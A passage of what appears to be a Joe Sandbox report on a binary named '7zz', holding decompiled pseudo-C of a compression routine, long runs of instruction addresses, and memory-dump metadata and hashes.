								_t425 =  *(_t624 + 0x325a8) &  *(_t625 + 0x14);
								 *(_t625 + 0x18) = _t300;
								 *(_t625 + 0x28) = _t425;
								__eflags = _t300 - 1;
								if(_t300 != 1) {
									goto L30;
								}
								__eflags =  *(_t625 + 0x10) - 0xffffffff;
								if( *(_t625 + 0x10) != 0xffffffff) {
									goto L30;
								} else {
									_t525 = ( *(_t624 + 0x3194c) << 4) + _t425;
									_t394 =  *(_t624 + 0x325b0 + _t525 * 2) & 0x0000ffff;
									_t606 = _t624 + 0x3bcb0;
									 *_t606 = ( *(_t624 + 0x3bcb0) >> 0xb) * _t394;
									 *(_t624 + 0x325b0 + _t525 * 2) = (0x800 - _t394 >> 5) + _t394;
									_t395 =  *_t606;
									__eflags = _t395 - 0x1000000;
									if(_t395 < 0x1000000) {
										_t405 = _t395 << 8;
										__eflags = _t405;
										 *_t606 = _t405;
										L0045F780(_t606);
									}
									_t398 =  *((intOrPtr*)( *((intOrPtr*)(_t624 + 0xc))))() -  *(_t624 + 0x31938);
									 *(_t625 + 0x28) =  *_t398;
									_t459 = _t606;
									_t537 = ((( *(_t398 - 1) & 0x000000ff) >> 8 -  *(_t624 + 0x32598)) + (( *(_t624 + 0x325a4) &  *(_t625 + 0x14)) <<  *(_t624 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t624 + 0x325ac));
									__eflags =  *(_t624 + 0x3194c) - 7;
									if( *(_t624 + 0x3194c) >= 7) {
										__eflags = _t398 -  *(_t624 + 0x3193c);
										L0045FAB0( *(_t625 + 0x2c) & 0x000000ff, _t459, _t537,  *(_t398 -  *(_t624 + 0x3193c) - 1) & 0x000000ff);
									} else {
										L0045FA30( *(_t625 + 0x28) & 0x000000ff, _t459, _t537);
									}
									 *(_t624 + 0x3194c) =  *(0x47c5dc +  *(_t624 + 0x3194c) * 4);
								}
								L69:
								_t452 =  *(_t625 + 0x18);
								 *(_t624 + 0x31938) =  *(_t624 + 0x31938) - _t452;
								_t324 =  *(_t624 + 0x31938);
								 *(_t625 + 0x14) =  *(_t625 + 0x14) + _t452;
								__eflags = _t324;
								if(_t324 != 0) {
									L18:
									_t589 =  *(_t625 + 0x14);
									continue;
								}
								__eflags =  *(_t624 + 0x3bca8) - _t324;
								if( *(_t624 + 0x3bca8) == _t324) {
									__eflags =  *(_t624 + 0x3bcf8) - 0x80;
									if( *(_t624 + 0x3bcf8) >= 0x80) {
										E00461BC0(_t624);
									}
									__eflags =  *(_t624 + 0x32590) - 0x10;
									if( *(_t624 + 0x32590) >= 0x10) {
										E00461B30(_t624);
									}
								}
								_t539 =  *(_t624 + 8);
								_t327 =  *_t539();
								__eflags = _t327;
								if(_t327 == 0) {
									L81:
									_t589 =  *(_t625 + 0x14);
									goto L82;
								}
								_t329 =  *(_t625 + 0x14) -  *((intOrPtr*)(_t625 + 0x1c));
								__eflags =  *(_t625 + 0x2c);
								if( *(_t625 + 0x2c) != 0) {
									__eflags = _t329 + 0x112c -  *((intOrPtr*)(_t625 + 0x34));
									if(_t329 + 0x112c >=  *((intOrPtr*)(_t625 + 0x34))) {
										goto L81;
									}
									asm("cdq");
									asm("adc edx, [ebp+0x3bcdc]");
									asm("adc edx, [ebp+0x3bcc4]");
									_t338 =  *((intOrPtr*)(_t624 + 0x3bcc8)) -  *((intOrPtr*)(_t624 + 0x3bcd0)) +  *((intOrPtr*)(_t624 + 0x3bcd8)) +  *((intOrPtr*)(_t624 + 0x3bcc0)) + 0x2000;
									asm("adc edx, 0x0");
									__eflags = _t539;
									if(__eflags > 0) {
										goto L81;
									}
									if(__eflags < 0) {
										goto L18;
									} else {
										__eflags = _t338 -  *((intOrPtr*)(_t625 + 0x30));
										if(_t338 <  *((intOrPtr*)(_t625 + 0x30))) {
											goto L18;
										} else {
											goto L81;
										}
									}
									L85:
									_t292 = _t624 + 0x3bcf0;
									 *_t292 =  *(_t624 + 0x3bcf0) +  *(_t625 + 0x14) -  *((intOrPtr*)(_t625 + 0x1c));
									__eflags =  *_t292;
									asm("adc dword [ebp+0x3bcf4], 0x0");
									return E00461A30(_t624);
									goto L86;
								}
								__eflags = _t329 - 0x8000;
								if(_t329 < 0x8000) {
									goto L18;
								}
								goto L85;
								L30:
								_t508 =  *(_t624 + 0x3bcb0);
								_t604 = _t624 + 0x325b0 + (( *(_t624 + 0x3194c) << 4) + _t425) * 2;
								_t304 =  *_t604 & 0x0000ffff;
								_t438 = (_t508 >> 0xb) * _t304;
								 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t438;
								asm("adc dword [ebp+0x3bcbc], 0x0");
								 *(_t624 + 0x3bcb0) = _t508 - _t438;
								 *_t604 = _t304 - (_t304 >> 5);
								_t306 =  *(_t624 + 0x3bcb0);
								__eflags = _t306 - 0x1000000;
								if(_t306 < 0x1000000) {
									_t392 = _t306 << 8;
									__eflags = _t392;
									 *(_t624 + 0x3bcb0) = _t392;
									L0045F780(_t624 + 0x3bcb0);
								}
								__eflags =  *(_t625 + 0x10) - 4;
								_t510 =  *(_t624 + 0x3194c);
								if( *(_t625 + 0x10) >= 4) {
									_t307 =  *(_t624 + 0x32730 + _t510 * 2) & 0x0000ffff;
									 *(_t624 + 0x3bcb0) = ( *(_t624 + 0x3bcb0) >> 0xb) * _t307;
									 *(_t624 + 0x32730 + _t510 * 2) = (0x800 - _t307 >> 5) + _t307;
									_t308 =  *(_t624 + 0x3bcb0);
									__eflags = _t308 - 0x1000000;
									if(_t308 < 0x1000000) {
										_t351 = _t308 << 8;
										__eflags = _t351;
										 *(_t624 + 0x3bcb0) = _t351;
										L0045F780(_t624 + 0x3bcb0);
									}
									__eflags =  *(_t624 + 0x3bca8);
									 *(_t624 + 0x3194c) =  *(0x47c60c +  *(_t624 + 0x3194c) * 4);
									 *(_t625 + 0x24) = 0 |  *(_t624 + 0x3bca8) == 0x00000000;
									L0045FD50(_t425, _t624 + 0x3bcb0, _t624 + 0x32c14,  *(_t625 + 0x18) + 0xfffffffe);
									__eflags =  *(_t625 + 0x20);
									if( *(_t625 + 0x20) != 0) {
										_t218 = _t624 + 0x3741c + _t425 * 4;
										 *_t218 =  *(_t624 + 0x3741c + _t425 * 4) - 1;
										__eflags =  *_t218;
										if( *_t218 == 0) {
											__eflags = _t425 * 0x440;
											L0045FE90(_t624 + 0x32c14, _t624 + 0x30ea0, _t425,  *((intOrPtr*)(_t624 + 0x37418)), _t425 * 0x440 + _t624 + 0x33018);
											 *((intOrPtr*)(_t624 + 0x3741c +  *(_t625 + 0x28) * 4)) =  *((intOrPtr*)(_t624 + 0x37418));
										}
									}
									_t315 =  *(_t625 + 0x10) - 4;
									 *(_t625 + 0x10) = _t315;
									__eflags = _t315 - 0x80;
									if(_t315 >= 0x80) {
										_t449 = ( ~(0x1ffff - _t315 >> 0x1f) & 0x0000000a) + 6;
										_t316 = _t315 >> _t449;
										__eflags = _t316;
										_t605 = ( *(_t316 + _t624 + 0x306a0) & 0x000000ff) + _t449 * 2;
									} else {
										_t605 =  *(_t315 + _t624 + 0x306a0) & 0x000000ff;
									}
									_t317 =  *(_t625 + 0x18);
									__eflags = _t317 - 5;
									if(_t317 >= 5) {
										_t318 = 3;
									} else {
										_t318 = _t317 + 0xfffffffe;
									}
									_push(_t605);
									_push(6);
									_push((_t318 << 7) + _t624 + 0x32910);
									L0045FC40(_t624 + 0x3bcb0);
									__eflags = _t605 - 4;
									if(_t605 >= 4) {
										_t343 = (_t605 >> 1) - 1;
										_t544 = (_t605 & 0x00000001 | 0x00000002) << (_t605 >> 1) - 1;
										_t428 =  *(_t625 + 0x10) - ((_t605 & 0x00000001 | 0x00000002) << (_t605 >> 1) - 1);
										__eflags = _t605 - 0xe;
										if(_t605 >= 0xe) {
											L0045F8F0(_t624 + 0x3bcb0, _t428 >> 4, _t343 + 0xfffffffc);
											L0045FCC0(4, _t624 + 0x3bcb0, _t624 + 0x32bf4, _t428 & 0x0000000f);
											_t254 = _t624 + 0x32590;
											 *_t254 =  *(_t624 + 0x32590) + 1;
											__eflags =  *_t254;
										} else {
											L0045FCC0(_t343, _t624 + 0x3bcb0, _t624 + 0x32b0e + (_t544 - _t605) * 2, _t428);
										}
									}
									_t259 = _t624 + 0x3bcf8;
									 *_t259 =  *(_t624 + 0x3bcf8) + 1;
									__eflags =  *_t259;
									 *(_t624 + 0x31948) =  *(_t624 + 0x31944);
									 *(_t624 + 0x31944) =  *(_t624 + 0x31940);
									 *(_t624 + 0x31940) =  *(_t624 + 0x3193c);
									 *(_t624 + 0x3193c) =  *(_t625 + 0x10);
								} else {
									_t353 =  *(_t624 + 0x32730 + _t510 * 2) & 0x0000ffff;
									_t550 =  *(_t624 + 0x3bcb0);
									_t474 = (_t550 >> 0xb) * _t353;
									 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t474;
									asm("adc dword [ebp+0x3bcbc], 0x0");
									 *(_t624 + 0x3bcb0) = _t550 - _t474;
									 *(_t624 + 0x32730 + _t510 * 2) = _t353 - (_t353 >> 5);
									_t355 =  *(_t624 + 0x3bcb0);
									__eflags = _t355 - 0x1000000;
									if(_t355 < 0x1000000) {
										_t390 = _t355 << 8;
										__eflags = _t390;
										 *(_t624 + 0x3bcb0) = _t390;
										L0045F780(_t624 + 0x3bcb0);
									}
									_t356 =  *(_t625 + 0x10);
									__eflags = _t356;
									if(_t356 != 0) {
										_t612 = _t624 + 0x32748 +  *(_t624 + 0x3194c) * 2;
										_t358 =  *_t612 & 0x0000ffff;
										 *(_t625 + 0x20) =  *(_t624 + 0x3193c + _t356 * 4);
										_t553 =  *(_t624 + 0x3bcb0);
										_t479 = (_t553 >> 0xb) * _t358;
										 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t479;
										asm("adc dword [ebp+0x3bcbc], 0x0");
										 *(_t624 + 0x3bcb0) = _t553 - _t479;
										 *_t612 = _t358 - (_t358 >> 5);
										_t360 =  *(_t624 + 0x3bcb0);
										__eflags = _t360 - 0x1000000;
										if(_t360 < 0x1000000) {
											_t380 = _t360 << 8;
											__eflags = _t380;
											 *(_t624 + 0x3bcb0) = _t380;
											L0045F780(_t624 + 0x3bcb0);
										}
										__eflags =  *(_t625 + 0x10) - 1;
										if( *(_t625 + 0x10) != 1) {
											_t555 =  *(_t624 + 0x3bcb0);
											_t613 = _t624 + 0x32760 +  *(_t624 + 0x3194c) * 2;
											_t362 =  *_t613 & 0x0000ffff;
											_t484 = (_t555 >> 0xb) * _t362;
											 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t484;
											asm("adc dword [ebp+0x3bcbc], 0x0");
											 *(_t624 + 0x3bcb0) = _t555 - _t484;
											 *_t613 = _t362 - (_t362 >> 5);
											_t364 =  *(_t624 + 0x3bcb0);
											__eflags = _t364 - 0x1000000;
											if(_t364 < 0x1000000) {
												_t374 = _t364 << 8;
												__eflags = _t374;
												 *(_t624 + 0x3bcb0) = _t374;
												L0045F780(_t624 + 0x3bcb0);
											}
											L0045F9D0(_t624 + 0x3bcb0, _t624 + 0x32778 +  *(_t624 + 0x3194c) * 2,  *(_t625 + 0x10) + 0xfffffffe);
											__eflags =  *(_t625 + 0x10) - 3;
											if( *(_t625 + 0x10) == 3) {
												 *(_t624 + 0x31948) =  *(_t624 + 0x31944);
											}
											_t425 =  *(_t625 + 0x28);
											 *(_t624 + 0x31944) =  *(_t624 + 0x31940);
										} else {
											_t562 =  *(_t624 + 0x3194c);
											_t376 =  *(_t624 + 0x32760 + _t562 * 2) & 0x0000ffff;
											 *(_t624 + 0x3bcb0) = ( *(_t624 + 0x3bcb0) >> 0xb) * _t376;
											 *(_t624 + 0x32760 + _t562 * 2) = (0x800 - _t376 >> 5) + _t376;
											_t377 =  *(_t624 + 0x3bcb0);
											__eflags = _t377 - 0x1000000;
											if(_t377 < 0x1000000) {
												 *(_t624 + 0x3bcb0) = _t377 << 8;
												L0045F780(_t624 + 0x3bcb0);
											}
										}
										 *(_t624 + 0x31940) =  *(_t624 + 0x3193c);
										 *(_t624 + 0x3193c) =  *(_t625 + 0x20);
									} else {
										_t570 =  *(_t624 + 0x3194c);
										_t382 =  *(_t624 + 0x32748 + _t570 * 2) & 0x0000ffff;
										 *(_t624 + 0x3bcb0) = ( *(_t624 + 0x3bcb0) >> 0xb) * _t382;
										 *(_t624 + 0x32748 + _t570 * 2) = (0x800 - _t382 >> 5) + _t382;
										_t383 =  *(_t624 + 0x3bcb0);
										__eflags = _t383 - 0x1000000;
										if(_t383 < 0x1000000) {
											_t388 = _t383 << 8;
											__eflags = _t388;
											 *(_t624 + 0x3bcb0) = _t388;
											L0045F780(_t624 + 0x3bcb0);
										}
										__eflags =  *(_t625 + 0x18) - 1;
										L0045F9D0(_t624 + 0x3bcb0, _t624 + 0x32790 + (( *(_t624 + 0x3194c) << 4) + _t425) * 2, 0 |  *(_t625 + 0x18) != 0x00000001);
										_t425 =  *(_t625 + 0x28);
									}
									__eflags =  *(_t625 + 0x18) - 1;
									if( *(_t625 + 0x18) != 1) {
										__eflags =  *(_t624 + 0x3bca8);
										_push(0 | __eflags == 0x00000000);
										E00460070( *(_t625 + 0x18) + 0xfffffffe, _t624 + 0x3bcb0, _t425, _t624 + 0x30ea0, __eflags, _t624 + 0x3745c);
										 *(_t624 + 0x3194c) =  *(0x47c63c +  *(_t624 + 0x3194c) * 4);
									} else {
										 *(_t624 + 0x3194c) =  *(0x47c66c +  *(_t624 + 0x3194c) * 4);
									}
								}
								goto L69;
							}
						} else {
							_t407 =  *( *(_t624 + 8))();
							__eflags = _t407;
							if(_t407 != 0) {
								E004600C0(_t624, _t625 + 0x24);
								_t500 =  *(_t624 + 0x3194c) << 5;
								_t410 =  *(_t500 + _t624 + 0x325b0) & 0x0000ffff;
								_t622 = _t624 + 0x3bcb0;
								 *_t622 = ( *(_t624 + 0x3bcb0) >> 0xb) * _t410;
								 *(_t500 + _t624 + 0x325b0) = (0x800 - _t410 >> 5) + _t410;
								_t411 =  *_t622;
								__eflags = _t411 - 0x1000000;
								if(_t411 < 0x1000000) {
									_t417 = _t411 << 8;
									__eflags = _t417;
									 *_t622 = _t417;
									L0045F780(_t622);
								}
								 *(_t624 + 0x3194c) =  *(0x47c5dc +  *(_t624 + 0x3194c) * 4);
								L0045FA30( *((intOrPtr*)( *((intOrPtr*)(_t624 + 4))))() & 0x000000ff, _t622,  *((intOrPtr*)(_t624 + 0x325ac)));
								 *(_t624 + 0x31938) =  *(_t624 + 0x31938) - 1;
								_t589 = _t589 + 1;
								__eflags = _t589;
								 *(_t625 + 0x10) = _t589;
								goto L16;
							} else {
								return E00461A80(_t624, _t589);
							}
						}
					} else {
						 *((intOrPtr*)(_t624 + 0x3bcfc)) = 1;
						return _t295;
					}
				}
				L86:
			}













































































                                                                                                                                    0x00461ef4
                                                                                                                                    0x00461eff
                                                                                                                                    0x00461f07
                                                                                                                                    0x00461f09
                                                                                                                                    0x00461f09
                                                                                                                                    0x00461f1a
                                                                                                                                    0x00461f20
                                                                                                                                    0x0046278e
                                                                                                                                    0x00461f2e
                                                                                                                                    0x00461f34
                                                                                                                                    0x00461f36
                                                                                                                                    0x00461f36
                                                                                                                                    0x00461f47
                                                                                                                                    0x00461f49
                                                                                                                                    0x00461f49
                                                                                                                                    0x00461f53
                                                                                                                                    0x00461f5b
                                                                                                                                    0x00461f70
                                                                                                                                    0x00461f78
                                                                                                                                    0x00461f7e
                                                                                                                                    0x00461f82
                                                                                                                                    0x00461f86
                                                                                                                                    0x00462042
                                                                                                                                    0x00462049
                                                                                                                                    0x0046204b
                                                                                                                                    0x0046204d
                                                                                                                                    0x0046276c
                                                                                                                                    0x00462773
                                                                                                                                    0x00462773
                                                                                                                                    0x00462773
                                                                                                                                    0x0046277b
                                                                                                                                    0x00000000
                                                                                                                                    0x00462789
                                                                                                                                    0x00462064
                                                                                                                                    0x00462064
                                                                                                                                    0x0046206b
                                                                                                                                    0x0046207f
                                                                                                                                    0x00462080
                                                                                                                                    0x00462081
                                                                                                                                    0x00462082
                                                                                                                                    0x0046206d
                                                                                                                                    0x00462071
                                                                                                                                    0x00462074
                                                                                                                                    0x00462074
                                                                                                                                    0x0046208d
                                                                                                                                    0x00462091
                                                                                                                                    0x00462095
                                                                                                                                    0x00462099
                                                                                                                                    0x0046209c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004620a2
                                                                                                                                    0x004620a7
                                                                                                                                    0x00000000
                                                                                                                                    0x004620ad
                                                                                                                                    0x004620b6
                                                                                                                                    0x004620b8
                                                                                                                                    0x004620cd
                                                                                                                                    0x004620d9
                                                                                                                                    0x004620e7
                                                                                                                                    0x004620ea
                                                                                                                                    0x004620ec
                                                                                                                                    0x004620f1
                                                                                                                                    0x004620f3
                                                                                                                                    0x004620f3
                                                                                                                                    0x004620f6
                                                                                                                                    0x004620f8
                                                                                                                                    0x004620f8
                                                                                                                                    0x00462105
                                                                                                                                    0x00462121
                                                                                                                                    0x00462132
                                                                                                                                    0x0046213c
                                                                                                                                    0x00462142
                                                                                                                                    0x00462149
                                                                                                                                    0x00462158
                                                                                                                                    0x00462169
                                                                                                                                    0x0046214b
                                                                                                                                    0x00462151
                                                                                                                                    0x00462151
                                                                                                                                    0x0046217b
                                                                                                                                    0x0046217b
                                                                                                                                    0x004626b8
                                                                                                                                    0x004626b8
                                                                                                                                    0x004626bc
                                                                                                                                    0x004626c2
                                                                                                                                    0x004626c8
                                                                                                                                    0x004626cc
                                                                                                                                    0x004626ce
                                                                                                                                    0x00462060
                                                                                                                                    0x00462060
                                                                                                                                    0x00000000
                                                                                                                                    0x00462060
                                                                                                                                    0x004626d4
                                                                                                                                    0x004626da
                                                                                                                                    0x004626dc
                                                                                                                                    0x004626e6
                                                                                                                                    0x004626ea
                                                                                                                                    0x004626ea
                                                                                                                                    0x004626ef
                                                                                                                                    0x004626f6
                                                                                                                                    0x004626fa
                                                                                                                                    0x004626fa
                                                                                                                                    0x004626f6
                                                                                                                                    0x00462702
                                                                                                                                    0x00462705
                                                                                                                                    0x00462707
                                                                                                                                    0x00462709
                                                                                                                                    0x00462768
                                                                                                                                    0x00462768
                                                                                                                                    0x00000000
                                                                                                                                    0x00462768
                                                                                                                                    0x0046270f
                                                                                                                                    0x00462713
                                                                                                                                    0x00462718
                                                                                                                                    0x0046271f
                                                                                                                                    0x00462723
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00462731
                                                                                                                                    0x00462738
                                                                                                                                    0x00462744
                                                                                                                                    0x0046274a
                                                                                                                                    0x0046274f
                                                                                                                                    0x00462754
                                                                                                                                    0x00462756
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00462758
                                                                                                                                    0x00000000
                                                                                                                                    0x0046275e
                                                                                                                                    0x0046275e
                                                                                                                                    0x00462762
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00462762
                                                                                                                                    0x0046279c
                                                                                                                                    0x004627a6
                                                                                                                                    0x004627a6
                                                                                                                                    0x004627a6
                                                                                                                                    0x004627ac
                                                                                                                                    0x004627bf
                                                                                                                                    0x00000000
                                                                                                                                    0x004627bf
                                                                                                                                    0x00462791
                                                                                                                                    0x00462796
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00462186
                                                                                                                                    0x0046218c
                                                                                                                                    0x00462197
                                                                                                                                    0x0046219e
                                                                                                                                    0x004621a6
                                                                                                                                    0x004621a9
                                                                                                                                    0x004621af
                                                                                                                                    0x004621bf
                                                                                                                                    0x004621c5
                                                                                                                                    0x004621c8
                                                                                                                                    0x004621ce
                                                                                                                                    0x004621d3
                                                                                                                                    0x004621d5
                                                                                                                                    0x004621d5
                                                                                                                                    0x004621de
                                                                                                                                    0x004621e4
                                                                                                                                    0x004621e4
                                                                                                                                    0x004621e9
                                                                                                                                    0x004621ee
                                                                                                                                    0x004621f4
                                                                                                                                    0x004624d6
                                                                                                                                    0x004624f1
                                                                                                                                    0x00462503
                                                                                                                                    0x00462506
                                                                                                                                    0x0046250c
                                                                                                                                    0x00462511
                                                                                                                                    0x00462513
                                                                                                                                    0x00462513
                                                                                                                                    0x0046251c
                                                                                                                                    0x00462522
                                                                                                                                    0x00462522
                                                                                                                                    0x0046253a
                                                                                                                                    0x00462540
                                                                                                                                    0x00462555
                                                                                                                                    0x0046255f
                                                                                                                                    0x00462564
                                                                                                                                    0x00462569
                                                                                                                                    0x0046256b
                                                                                                                                    0x0046256b
                                                                                                                                    0x0046256b
                                                                                                                                    0x00462572
                                                                                                                                    0x00462576
                                                                                                                                    0x00462598
                                                                                                                                    0x004625a7
                                                                                                                                    0x004625a7
                                                                                                                                    0x00462572
                                                                                                                                    0x004625b2
                                                                                                                                    0x004625b5
                                                                                                                                    0x004625b9
                                                                                                                                    0x004625be
                                                                                                                                    0x004625d9
                                                                                                                                    0x004625dc
                                                                                                                                    0x004625dc
                                                                                                                                    0x004625e6
                                                                                                                                    0x004625c0
                                                                                                                                    0x004625c0
                                                                                                                                    0x004625c0
                                                                                                                                    0x004625e9
                                                                                                                                    0x004625ed
                                                                                                                                    0x004625f0
                                                                                                                                    0x004625f7
                                                                                                                                    0x004625f2
                                                                                                                                    0x004625f2
                                                                                                                                    0x004625f2
                                                                                                                                    0x004625fc
                                                                                                                                    0x00462607
                                                                                                                                    0x00462609
                                                                                                                                    0x00462610
                                                                                                                                    0x00462615
                                                                                                                                    0x00462618
                                                                                                                                    0x00462627
                                                                                                                                    0x0046262d
                                                                                                                                    0x0046262f
                                                                                                                                    0x00462631
                                                                                                                                    0x00462634
                                                                                                                                    0x0046265e
                                                                                                                                    0x00462679
                                                                                                                                    0x0046267e
                                                                                                                                    0x0046267e
                                                                                                                                    0x0046267e
                                                                                                                                    0x00462636
                                                                                                                                    0x00462647
                                                                                                                                    0x00462647
                                                                                                                                    0x00462634
                                                                                                                                    0x00462696
                                                                                                                                    0x00462696
                                                                                                                                    0x00462696
                                                                                                                                    0x0046269c
                                                                                                                                    0x004626a6
                                                                                                                                    0x004626ac
                                                                                                                                    0x004626b2
                                                                                                                                    0x004621fa
                                                                                                                                    0x004621fa
                                                                                                                                    0x00462209
                                                                                                                                    0x00462214
                                                                                                                                    0x00462217
                                                                                                                                    0x0046221d
                                                                                                                                    0x0046222d
                                                                                                                                    0x00462233
                                                                                                                                    0x00462236
                                                                                                                                    0x0046223c
                                                                                                                                    0x00462241
                                                                                                                                    0x00462243
                                                                                                                                    0x00462243
                                                                                                                                    0x0046224c
                                                                                                                                    0x00462252
                                                                                                                                    0x00462252
                                                                                                                                    0x00462257
                                                                                                                                    0x0046225b
                                                                                                                                    0x0046225d
                                                                                                                                    0x004622f8
                                                                                                                                    0x004622ff
                                                                                                                                    0x00462302
                                                                                                                                    0x00462306
                                                                                                                                    0x00462311
                                                                                                                                    0x00462314
                                                                                                                                    0x0046231a
                                                                                                                                    0x0046232a
                                                                                                                                    0x00462330
                                                                                                                                    0x00462333
                                                                                                                                    0x00462339
                                                                                                                                    0x0046233e
                                                                                                                                    0x00462340
                                                                                                                                    0x00462340
                                                                                                                                    0x00462349
                                                                                                                                    0x0046234f
                                                                                                                                    0x0046234f
                                                                                                                                    0x00462354
                                                                                                                                    0x00462359
                                                                                                                                    0x004623c1
                                                                                                                                    0x004623c7
                                                                                                                                    0x004623ce
                                                                                                                                    0x004623d6
                                                                                                                                    0x004623d9
                                                                                                                                    0x004623df
                                                                                                                                    0x004623ef
                                                                                                                                    0x004623f5
                                                                                                                                    0x004623f8
                                                                                                                                    0x004623fe
                                                                                                                                    0x00462403
                                                                                                                                    0x00462405
                                                                                                                                    0x00462405
                                                                                                                                    0x0046240e
                                                                                                                                    0x00462414
                                                                                                                                    0x00462414
                                                                                                                                    0x00462434
                                                                                                                                    0x00462439
                                                                                                                                    0x0046243e
                                                                                                                                    0x00462446
                                                                                                                                    0x00462446
                                                                                                                                    0x00462452
                                                                                                                                    0x00462456
                                                                                                                                    0x0046235b
                                                                                                                                    0x0046235b
                                                                                                                                    0x00462361
                                                                                                                                    0x0046237c
                                                                                                                                    0x0046238e
                                                                                                                                    0x00462391
                                                                                                                                    0x00462397
                                                                                                                                    0x0046239c
                                                                                                                                    0x004623ab
                                                                                                                                    0x004623b1
                                                                                                                                    0x004623b1
                                                                                                                                    0x0046239c
                                                                                                                                    0x00462466
                                                                                                                                    0x0046246c
                                                                                                                                    0x00462263
                                                                                                                                    0x00462263
                                                                                                                                    0x00462269
                                                                                                                                    0x00462284
                                                                                                                                    0x00462296
                                                                                                                                    0x00462299
                                                                                                                                    0x0046229f
                                                                                                                                    0x004622a4
                                                                                                                                    0x004622a6
                                                                                                                                    0x004622a6
                                                                                                                                    0x004622af
                                                                                                                                    0x004622b5
                                                                                                                                    0x004622b5
                                                                                                                                    0x004622c2
                                                                                                                                    0x004622dd
                                                                                                                                    0x004622e2
                                                                                                                                    0x004622e2
                                                                                                                                    0x00462472
                                                                                                                                    0x00462477
                                                                                                                                    0x00462497
                                                                                                                                    0x004624b1
                                                                                                                                    0x004624b9
                                                                                                                                    0x004624cb
                                                                                                                                    0x00462479
                                                                                                                                    0x00462486
                                                                                                                                    0x00462486
                                                                                                                                    0x00462477
                                                                                                                                    0x00000000
                                                                                                                                    0x004621f4
                                                                                                                                    0x00461f8c
                                                                                                                                    0x00461f92
                                                                                                                                    0x00461f94
                                                                                                                                    0x00461f96
                                                                                                                                    0x00461fb0
                                                                                                                                    0x00461fc1
                                                                                                                                    0x00461fc4
                                                                                                                                    0x00461fcc
                                                                                                                                    0x00461fdf
                                                                                                                                    0x00461fed
                                                                                                                                    0x00461ff0
                                                                                                                                    0x00461ff2
                                                                                                                                    0x00461ff7
                                                                                                                                    0x00461ff9
                                                                                                                                    0x00461ff9
                                                                                                                                    0x00461ffc
                                                                                                                                    0x00461ffe
                                                                                                                                    0x00461ffe
                                                                                                                                    0x00462019
                                                                                                                                    0x00462032
                                                                                                                                    0x00462037
                                                                                                                                    0x0046203d
                                                                                                                                    0x0046203d
                                                                                                                                    0x0046203e
                                                                                                                                    0x00000000
                                                                                                                                    0x00461f98
                                                                                                                                    0x00461fa6
                                                                                                                                    0x00461fa6
                                                                                                                                    0x00461f96
                                                                                                                                    0x00461f5d
                                                                                                                                    0x00461f5d
                                                                                                                                    0x00461f6b
                                                                                                                                    0x00461f6b
                                                                                                                                    0x00461f5b
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d4105cb9875b833a4641f56c3298e018c9a015dc758ede18aa80ab4fa4bcddc2
                                                                                                                                    • Instruction ID: 111ae33a3b18cc3aeac857ece66931766c3972f92f30f96c0da3dc925ecae691
                                                                                                                                    • Opcode Fuzzy Hash: d4105cb9875b833a4641f56c3298e018c9a015dc758ede18aa80ab4fa4bcddc2
                                                                                                                                    • Instruction Fuzzy Hash: D532C0716142898FCB36CF29CD916DD37AAFFA8308F10452AED498B394EF349A45CB45
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00460DF8 Relevance: .5, Instructions: 487COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E00460DF8() {
				signed int _t647;
				signed int _t650;
				void* _t659;
				signed int _t662;
				signed int _t663;
				unsigned int _t672;
				signed int _t673;
				intOrPtr _t678;
				signed int _t681;
				signed int _t683;
				void* _t686;
				signed int _t688;
				signed int _t689;
				void* _t694;
				signed int _t695;
				signed int _t697;
				signed int _t699;
				signed int _t702;
				signed int _t704;
				void* _t706;
				signed int _t711;
				intOrPtr _t719;
				signed int _t725;
				signed int _t727;
				void* _t728;
				signed int _t733;
				void* _t734;
				intOrPtr _t735;
				signed int _t737;
				void* _t740;
				signed int _t746;
				intOrPtr _t754;
				signed int _t760;
				signed int _t762;
				void* _t765;
				intOrPtr* _t766;
				signed int _t767;
				signed int _t769;
				intOrPtr _t773;
				intOrPtr* _t775;
				signed int _t780;
				void* _t784;
				signed int _t791;
				void* _t792;
				signed int _t793;
				signed int _t795;
